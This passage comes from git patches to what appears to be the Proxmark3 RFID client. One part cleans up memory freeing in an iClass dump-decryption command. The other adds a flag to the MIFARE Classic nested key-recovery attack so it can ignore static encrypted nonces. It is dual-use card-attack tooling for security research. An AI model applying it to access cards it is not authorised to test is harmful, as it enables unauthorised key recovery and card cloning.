-1623,6 +1631,8 @@ static int CmdHFiClassDecrypt(const char *Cmd) { FillFileNameByUID(fptr, hdr->csn, "-dump-decrypted", sizeof(hdr->csn)); pm3_save_dump(fptr, decrypted, decryptedlen, jsfIclass); + free(fptr); + } printIclassDumpContents(decrypted, 1, (decryptedlen / 8), decryptedlen, dense_output); @@ -1634,11 +1644,9 @@ static int CmdHFiClassDecrypt(const char *Cmd) { // decode block 6 bool has_values = (memcmp(decrypted + (8 * 6), empty, 8) != 0) && (memcmp(decrypted + (8 * 6), zeros, 8) != 0); - if (has_values) { - if (use_sc) { + if (has_values && use_sc) { DecodeBlock6(decrypted + (8 * 6)); } - } // decode block 7-8-9 iclass_decode_credentials(decrypted); @@ -1664,7 +1672,6 @@ static int CmdHFiClassDecrypt(const char *Cmd) { PrintAndLogEx(INFO, "-----------------------------------------------------------------"); free(decrypted); - free(fptr); } mbedtls_des3_free(&ctx); From 8b2040ec5e2e8e50d0493ddebd4cced3574ba37f Mon Sep 17 00:00:00 2001 From: Nathan N Date: Mon, 22 Jul 2024 17:45:07 -0400 Subject: [PATCH 112/112] Allow static encrypted nonces to be collected via trace Signed-off-by: Nathan N --- client/src/cmdhfmf.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/client/src/cmdhfmf.c b/client/src/cmdhfmf.c index 7a3c44733..7ac5f2340 100644 --- a/client/src/cmdhfmf.c +++ b/client/src/cmdhfmf.c @@ -1617,6 +1617,7 @@ static int CmdHF14AMfNested(const char *Cmd) { //TODO: single mode broken? can't arg_lit0(NULL, "emu", "Fill simulator keys from found keys"), arg_lit0(NULL, "dump", "Dump found keys to file"), arg_lit0(NULL, "mem", "Use dictionary from flashmemory"), + arg_lit0("i", NULL, "Ignore static encrypted nonces"), arg_param_end }; CLIExecWithReturn(ctx, Cmd, argtable, false); @@ -1658,6 +1659,7 @@ static int CmdHF14AMfNested(const char *Cmd) { //TODO: single mode broken? can't bool createDumpFile = arg_get_lit(ctx, 13); bool singleSector = trgBlockNo > -1; bool use_flashmemory = arg_get_lit(ctx, 14); + bool ignore_static_encrypted = arg_get_lit(ctx, 15); CLIParserFree(ctx); @@ -1728,7 +1730,7 @@ static int CmdHF14AMfNested(const char *Cmd) { //TODO: single mode broken? can't } if (singleSector) { - int16_t isOK = mfnested(blockNo, keyType, key, trgBlockNo, trgKeyType, keyBlock, true); + int16_t isOK = mfnested(blockNo, keyType, key, trgBlockNo, trgKeyType, keyBlock, !ignore_static_encrypted); switch (isOK) { case PM3_ETIMEOUT: PrintAndLogEx(ERR, "Command execute timeout\n"); @@ -1803,7 +1805,7 @@ static int CmdHF14AMfNested(const char *Cmd) { //TODO: single mode broken? can't PrintAndLogEx(SUCCESS, "enter nested key recovery"); // nested sectors - bool calibrate = true; + bool calibrate = !ignore_static_encrypted; for (trgKeyType = MF_KEY_A; trgKeyType <= MF_KEY_B; ++trgKeyType) { for (uint8_t sectorNo = 0; sectorNo < SectorsCnt; ++sectorNo) {